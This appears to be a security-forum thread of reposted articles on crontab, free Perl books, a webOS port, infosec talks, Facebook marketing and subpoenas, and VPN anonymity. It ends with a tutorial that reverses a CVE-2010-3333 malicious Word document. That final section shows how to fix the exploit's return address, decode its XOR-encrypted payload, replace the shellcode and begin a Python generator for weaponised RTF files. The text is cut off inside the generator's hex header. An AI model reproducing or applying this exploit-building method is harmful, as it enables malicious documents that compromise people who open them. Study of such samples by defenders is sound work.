Nytro

[h=2]How to: Use crontab to schedule tasks[/h]Sunday, January 06, 2013 If you want to schedule to run a command or script periodically, crontab will be a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is: sudo crontab -e On my Arch Linux box, the default text editor is "vi" but on Linux Mint, when you run this command the first time, you will be asked to choose a text-editor. And similarly, the crontab file of Arch Linux is pure blank when the one of Linux Mint has many useful comment lines for you to understand how to use crontab. Here is the how the crontab file looks on Linux Mint (the text editor is nano ): The comment lines in the image above explain quite well about how to use crontab. The format to schedule a task with crontab is: * * * * * /any/command/or/script As you can see, there are 5 stars ( with a space between 2 stars) and each star represents one part of the date format in the following order: - minute ( value = 0 -> 59) - hour ( 0 -> 23) - day of month ( 1 -> 31) - month ( 1 -> 12) - day of week ( 0 -> 6 with 0 = Sunday) In short, to set a certain period to run a script, you just need to replace each star with a specific value. Note: If you dont need to set any value for a star, just leave the star in the command. A star means "every" so a command with all 5 stars will mean to run a task every minute until you delete this command from the crontab schedule. For example, to run a script at 7:00 AM on every Monday in the first three months of the year, the command will be: 0 7 * 1-3 1 /path/to/the/script As you can see, crontab is quite flexible with it format. You can use 1-5 in the day of week value to schedule a task to be run on work days. Or to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day of week value. For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, Feb, May and Oct, the command will be: 0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script Crontab also has some special keywords for you to use: @reboot at startup @yearly once a year @annually ( == @yearly) @monthly once a month @weekly once a week @daily once a day @midnight ( == @daily) @hourly once an hour If you use the keywords, you dont need to use the stars. For example, to run a script once everyday, the command will be: @daily /path/to/the/script And after you insert the right command the crontab file, just save the file and everything is scheduled now. To check the task you have scheduled with crontab, the command to use will be: sudo crontab -l Sursa: How to: Use crontab to schedule tasks ~ Linux and Life

16 of the Best Free Perl Books Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license. Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister. Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming. One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules. The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing. [TABLE=width: 100%] [TR] [TD=colspan: 2] 1. Modern Perl [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.onyxneon.com/books/modern_perl/index.html[/TD] [/TR] [TR] [TD]Author[/TD] [TD]chromatic[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, A4 PDF, HTML, ePub[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]204[/TD] [/TR] [/TABLE] Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed. Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code. This book providing a wealth of information on: The Perl Philosophy Perl and its Community focusing on CPAN, community and development sites The Perl Language introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures Operators - a series of one or more symbols used as part of the syntax Functions - a discrete, encapsulated unit of behaviour Regular Expressions and Matching - the use of these expressions gives Perl its incredible text processing power Objects - discrete, unique entities with their own identities Style and Efficacy explaining the importance of writing maintainable, idiomatic, and effective Perl Managing Real Problems covering testing, handling warnings, files, modules, distributions, and more Perl Beyond Syntax What to Avoid The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. 2. Beginning Perl [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.perl.org/books/beginning-perl/[/TD] [/TR] [TR] [TD]Author[/TD] [TD]Simon Cozens[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, HTML[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]672 [/TD] [/TR] [/TABLE] Beginning Perl is a book which as its name suggest is written for individuals that are new to programming who want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully through up to complex operations such as using Perl as a CGI language. The book covers the following topics: Installing Perl on Windows and UNIX Making use of online Perl resources like CPAN First principles in programming and the Perl syntax Working with simple values Lists and Hashes Loops and Decisions Regular Expressions Working with files and databases Writing web pages in Perl Subroutines Running and Debugging Perl Modules Using Perl as an object-oriented language Perl and Databases The World of Perl The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License. Restul cartilor: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html

[h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7 [/h]by Derek Kessler Mon, 31 Dec 2012 1:05 pm EST As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premiere launch devices for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure. Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus, so a lot of the work put into the smartphone project could be easily translated to the Nexus 7. How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college. The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project. A video of the port in action is after the break, and as an early alpha we're rather impressed. Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7 and more open source-y. Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing. The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next. Sursa: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation

http://www.youtube.com/watch?v=w9X1CP_jF6k

Si daca de exemplu folosesc autoruns? Sau alte 20 de utilitare?

Smartmeter Description: SMARTMETER A technological overview of the German roll-out This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany. SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planed roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi) which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication related details of whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smartmeter

At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2 Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2 Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2

[h=1]Cum vor sa castige bani retelele sociale precum Facebook[/h] Acoperirea a milioane de consumatori (potentiali clienti) Exista numeroase moduri de a ajunge la un anumit public in marketing. Printre acestea, se numara formularea unui chestionar pentru o cunoastere consolidata a propriei clientele si a mediilor in care sa faceti publicitate produsului dumneavoastra pentru a-l vinde cel mai bine. De exemplu, daca vindeti un tractor nou pentru o ferma agricola, ii veti face publicitate intr-o revista cumparata cu predilectie de fermieri. Astfel, acoperiti un segment de piata care va asigura cel mai mare volum de vanzari. Internetul et cookie-urile Daca detin un software care analizeaza frecventa operatiunilor de cumparare de catre fermieri pentru un anumit teritoriu... de exemplu, pot lansa cookie-uri pe un site web de vanzari online de tractoare pentru a inregistra de unde provin persoanele care viziteaza site-ul, care vand sau cumpara aceste tractoare, etc.. Ti-as putea spune, daca ai recurs la serviciile mele, la ce targ agricol ar trebui sa mergi pentru a avea cele mai mari sanse sa iti vinzi tractoarele. Asta pentru ca cookie-urile mele au detectat numerosi clienti potentiali in zona respectica. Cat ai fi dispus sa platesti pentru un astfel de serviciu de marketing? Investitiile pentru gasirea unor potentiali clienti s-ar reduce enorm, intrucat nu trebuie sa angajezi o armata de vanzatori care sa prospecteze piata in ani si ani de zile. Astfel, Facebook si retelele de socializare in general utilizeaza astfel de cookie-uri, sau ar putea sa le utilizeze pentru a gasi cumparatorii (cumparatoarele) unor diverse produse, indiferent ca sunt de lux ori produse de uz zilnic. Iar intreprinderile nu ar trebui decat sa cumpere aceste liste. Astfel de liste sunt disponibile in agentii de publicitate din intreaga lume. Acestea au un pret initial care variaza in functie de piata pe care doresti sa o abordezi. Cu cat lista este mai specializata, cu atat crearea acesteia costa mai mult, si pretul de vanzare este mai mare. O lista de baza, precum nume, prenume, adresa, nr. de telefon, etc., costa aproximativ 40 de dolari pentru 1000 de clienti potentiali, in SUA. O lista cu informatii precum activitatile exercitate, orasul de resedinta, numarul de proprietati dobandite de-a lungul vietii, stilul de viata al cumparatorilor, etc., are un pret mediu de aproximativ 120 de dolari pentru 1000 de clienti potentiali, tot in SUA. In prezent, Facebook merge si mai departe, datorita cookie-urilor si a obiceiurilor de cumparare ale consumatorilor. Aceasta va permite stabilirea ca tinta precisa a milioane de persoane, cu o fiabilitate marita cu 500%, intrucat Facebook poate utiliza un program software de recunoastere a cuvintelor de pe site-ul propriu. De exemplu, programul software poate urmari toate persoanele care au folosit cuvantul Mercedes Benz in postarile lor. Facebook va putea stabili astfel o lista de marketing extrem de precisa. Si bineinteles, pretul unei astfel de liste creste. Imaginati-va ca sunteti pe Facebook, discutati cu fratele ori cu un cumnat, si spuneti la un moment dat: „Da, ma gandesc sa cumpar o masina noua, un Mercedes Benz, in vreo doua zile”. Programul software recupereaza numele dumneavoastra, numele de utilizator, orasul in care locuiti, activitatea profesionala exercitata si orice alte informatii pertinente pentru a-si da seama de la ce firma de vanzare de automobile ati putea cumpara masina. Un reprezentant Facebook va suna la respectiva firma si va conveni cu aceasta sa ii furnizeze aceste informatii contra unei sume de bani. Dumneavoastra veti primi un telefon de la firma de automobile in cauza, care va invita sa profitati de o oferta de nerefuzat… Si uite-asa avem un tip de marketing cu o tinta extrem de precisa. Iar aceasta practica va aduce un venit de miliarde de dolari retelei Facebook. O astfel de lista poate ajunge la 2500 pana chiar la mai mult de 5000 de dolari pentru 1000 de clienti potentiali, inmultit, evident, cu numarul de utilizatori de Facebook. Evident, Facebook va stabili, de asemenea, asocieri, legaturi cu alte site-uri, va recomanda membrilor cumparaturi, prin intermediul altor site-uri, si altele de acest gen (marketing indirect). Iti poti face macar o cat de mica idee de bogatia pe care o detine aceasta companie. Iar acest proces urmeaza sa fie implementat de toate retelele sociale care exista in prezent pe web. Sursa: Cum vor sa castige bani retelele sociale precum Facebook

[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h] Daca tot faceti "chestii", nu va riscati. Folositi cel putin VPN (ca cele de aici). Daca nu e ok, atunci Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/

When the cops subpoena your Facebook information, here's what Facebook sends the cops NU e noua informatia, dar mi se pare utila. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID's were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it: Gasiti aici PDF: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx

Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, providing an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and have to analyze something suspicious. When I opened the document in hex, I found something suspicious as an address in pFragment parameter and that is bc41db77; let’s search this address in debugger (77db41bc): Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it/s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available. It can be made workable on xp sp3, by taking any address from the xp sp3 dll. I took it from kernel 32.dll ‘jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it. C:/RECYCLER/server.exe does the following: • Drops a file in the system’s temp folder: vmm2.tmp • File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll • Makes registry modifications in an attempt to hijack the DHCP service The payload has the ability to: • Download additional malware • Connect and send sensitive data back to remote servers • Act as a trojan proxy server So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it. 1) In hex editor 2) In debugger Let me open sample in hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure: at eeeeeeeeeeeee After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction XOR BYTE PTR DS [EDX+ECX], 0EE Also encryption begins from last to start, that is from eeeeeeee to the start of the shell code. Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE] So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it’s time to analyze the drop dll, which has been dropped into system32 with the name of dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in c:\windows\system32 folder, as in picture, and that is going to be executed by rundll32.exe. We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with debugger. There is a process in attaching debugger. I am going to attach it with WinWord, as it is an Office document file. After attaching and before executing, we have to set a breakpoint (F2) in debugger on various win32 function. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions that are desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLIbrary, etc. After setting a breakpoint, we have to Step Over (F8 ) in debugger and while doing this we will have to look carefully for some suspicious address in the stack windows of debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function get loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel ). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address, that is, The CreateFile function gets loaded at the suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address. In the above picture, look at the stack windows. There is a call to CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438. The CreateFile function gets loaded at the suspicious address (0011f438). Note that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is start location and end location of exe/dll, and the algorithm by which exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instruction: 00115F4E AC LODS BYTE PTR DS : [ESI] 0011F54F 3C 00 CMP AL, 0 0011F551 74 06 JE SHORT 0011F559 0011F553 3C FC CMP AL, 0FC 0011F555 74 02 JE SHORT 0011F559 0011F557 34 FC XOR AL, 0FC 0011F559 AA STOS BYTE PTR ES : [EDI] 0011F55A E2 F2 LOOPD SHORT 0011F54E Let’s look at the two boldfaced instructions: 00115F4E AC LODS BYTE PTR DS : [ESI] This instruction reads the address stored at ESI and stores its value to EAX, while the instruction 0011F559 AA STOS BYTE PTR ES : [EDI] stores the value of EAX to the EDI . So the encryption algorithm is to read each byte of exe; if it is 0 or OFC then leave it as it is, if not then XOR with OFC as in the instruction 0011F557 34 FC XOR AL, 0FC So we found the encryption. The next steps is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in dump windows: There is some sequence of values with ASCII 6161616161, etc.; let’s search this value in the Hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in dump ), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file ). If MZ is found, it indicates that this is the beginning of exe. Now what is the total size of exe? For that, we have to check the file that’s dropped into c:/windows/system32 dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of exe/dll. We find the total size of dll is DLL ADD8 in hex, 44504 in decimal. So now we have found: Encryption algorithm Start Location of dll/exe End location of dll/exe Now our main job is to write the creator with proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in the mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in the system32 (dll file ). So now it’s time to write the full creator code that I have written in Python. Here is the full creator: import datetime import os header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31" "\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67" "\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64" "\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33" "\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68" "\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C" "\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C" "\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74" "\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A" "\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33" "\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D" "\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C" "\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27" "\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" "\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" 